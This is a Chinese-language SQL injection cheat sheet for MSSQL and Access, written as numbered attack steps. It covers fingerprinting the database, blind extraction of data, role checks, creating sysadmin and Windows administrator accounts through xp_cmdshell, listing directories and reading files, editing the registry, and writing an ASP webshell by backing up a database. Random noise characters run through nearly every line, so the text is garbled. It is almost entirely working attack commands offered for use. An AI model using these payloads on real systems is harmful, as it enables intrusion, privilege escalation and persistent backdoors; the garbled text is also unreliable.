1.判断是否有注入;and 1=1 ;and 1=2 c*c 8S~6
2.初步判断是否是mssql ;and user>0 (S)jV0
Sz'H{?"
3.注入参数是字符'and [查询条件] and ''=' 'i5,2vT0
31)eDs
4.搜索时没过滤参数的'and [查询条件] and '%25'=' T}r}uw`
["7]EW\!:
5.判断数据库系统 vZJu=t
WTX!)H6Zv
;and (select count(*) from sysobjects)>0 mssql $z[r(a^a
k,0lA#>
;and (select count(*) from msysobjects)>0 access *\"+/
4ynGXJmMlR
tYST&5Kh~
CjT]!D)s
6.猜数据库 ;and (select Count(*) from [数据库名])>0 W'3~vQF
I\WBPI
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 7S.E,\Tws
-?Kd[Ma
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 W%_Cda5,
2}xvM"k=k
9.(1)猜字段的ascii值(access) ^"!)p2=
?j|i|WUD
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 GX,)~Syw*
!'f.g|a
(2)猜字段的ascii值(mssql) =Yt)b/0b9
PGNH<E)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ;{:bq`56f
;oGpB#[zO
10.测试权限结构(mssql) MG(qQ#;j/
]3&BLq
k?VH4yA
^\3r}kJ0Lp
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- +5xk6RP
m>&:)K}m
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- w6<zPrA
_4-UM2o;
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 0*F<tg,+]
RElIWqgY
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- }+dDGFk
c#<p44>U
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 07#e{
}y&tF'qG
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- _,bDv`>Ra
U])$#/ v
;and 1=(select IS_MEMBER('db_owner'));-- +LB2V3UZ
;q&2$Mb
.ovG_O
Z>(K|3_
11.添加mssql和系统的帐户 =niT]xf
Q~zs]{\
;exec master.dbo.sp_addlogin username;-- Y
wu
> k
;exec master.dbo.sp_password null,username,password;-- $ )orXe|
2!Sl!x+i\'
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 2kW*Z7@D
&[qJ=HMm I
;exec master.dbo.xp_cmdshell 'net user username password }[b3$WZ
Qa@]
sWcM
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- i(an]%'v
kJk6lPSqi7
;exec master.dbo.xp_cmdshell 'net user username password /add';-- %shCqS
Ck>{7Gw
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- _qvzZ6
Kw87 0n<
Bhg,P.7
HJ0Rcw%
12.(1)遍历目录 <gu>06
:)DvZx HE@
;create table dirs(paths varchar(100), id int) Wo+^R%K'4
RhD
;insert dirs exec master.dbo.xp_dirtree 'c:\' L7PMam
0@/C5 v
;and (select top 1 paths from dirs)>0 NT;cTa=;
UoOxGo
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 9?zi
/j"aOLL|
ykD-L^}
ufvjW]
(2)遍历目录 DT[WO_=
wuKr9W9Xa
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ;&`6b:ug
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 Hd89./v`:
ZYs?65.
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 w"
,ab j
V#TNv0&0
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 W-<`Vo'
Rgb&EnVW
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 KSQ*HO)5
9O|k|FD
Uc( z|
0;tu}]jnN
13.mssql中的存储过程 }S 6h1X
rj/1AK
xp_regenumvalues 注册表根键, 子键 XVzsqi*Z
h.4FY<
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 9=.7[-6i9
Mk8k,"RG&Z
xp_regread 根键,子键,键值名 UY^TTRrH
Svt%*j
;exec xp_regread L7nW_
C=x70Y/
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 +c' n,O~3
&?Z<"+B8S
xp_regwrite 根键,子键, 值名, 值类型, 值 Kj/Lcx;bh
b]g#mQ
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 Mw|lEctN0
(je`sV
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 TTD#ovo'
l._g[qa
xp_regdeletevalue 根键,子键,值名 5,9cD`WR^
bJ^Jmb
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 T$1(6<:+.
Zx^R -9
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 tY%T
2Ws'3Jz
k_`YVsEYP
;E0x#JUrw
14.mssql的backup创建webshell uLr-!T
K6s tkDhb
use model %e+{wU}w?2
^+x ,211f
create table cmd(str image); ubQr[/
%lGT|XrY
insert into cmd(str) values ('');
pER[^LH_)
?;GXFKy
backup database model to disk='c:\l.asp'; &'u%|A@
y=zs6HaS
lcXo>
j-zWckT{
15.mssql内置函数 z`sW5K(A
# blh9.V&F
;and (select @@version)>0 获得Windows的版本号 \jr-^n]
2XyC;RWJ%
;and user_name()='dbo' 判断当前系统的连接用户是不是sa (@Eb+8Zd
+de5y]1H,|
;and (select user_name())>0 爆当前系统的连接用户 .J?RaH{i
|Elz{i-
;and (select db_name())>0 得到当前连接的数据库 c*",AZ>U
d?><+!a
\O)u' Bu
m}t`43}QE
16.简洁的webshell vy5I#q(k
cd] X5)$h
use model 0aGAF ]
W?0u_F
create table cmd(str image); J]|S0JC`
M7ug<
8i
insert into cmd(str) values (''); syk,e4:oA
9#a/at]
backup database model to disk='g:\wwwtest\l.asp';